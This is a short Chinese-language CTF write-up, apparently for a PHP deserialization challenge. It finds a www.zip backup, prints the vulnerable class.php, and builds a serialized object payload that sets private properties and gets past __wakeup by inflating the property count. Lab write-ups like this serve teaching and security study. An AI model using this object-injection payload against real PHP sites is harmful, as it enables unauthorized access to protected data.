信息搜集

想查看页面源代码，但是右键没有这个选项。
我们可以ctrl+u或者在url前面加view-source:查看：
没什么有用信息。根据页面的hint，我们考虑扫一下目录看看能不能扫出一些文件.
扫到了备份文件www.zip，解压一下查看网站源代码。

代码审计：

index.php文件下：

class.php文件：

<?php
include 'flag.php';error_reporting(0);class Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;}function __wakeup(){$this->username = 'guest';}function __destruct(){if ($this->password != 100) {echo "</br>NO!!!hacker!!!</br>";echo "You name is: ";echo $this->username;echo "</br>";echo "You password is: ";echo $this->password;echo "</br>";die();}if ($this->username === 'admin') {global $flag;echo $flag;}else{echo "</br>hello my friend~~</br>sorry i can't give you the flag!";die();}}
}
?>

考察的是PHP反序列化漏洞.

反序列化

我们最终的目的是要获得flag，根据class.php文件，我们需要对象的成员变量 username='admin',password=100

所以序列化后的形式：

O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}因为成员变量是用private修饰的私有变量，所有要在变量中类名的前后添加%00，也就是/0

但是反序列化时会自动调用__wakeup方法，修改我们的username的值。
绕过__wakeup()：在反序列化时，当前属性个数大于实际属性个数时，就会跳过__wakeup()

所有序列化修改为：

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}"Name":2 修改成 "Name":3

得到flag.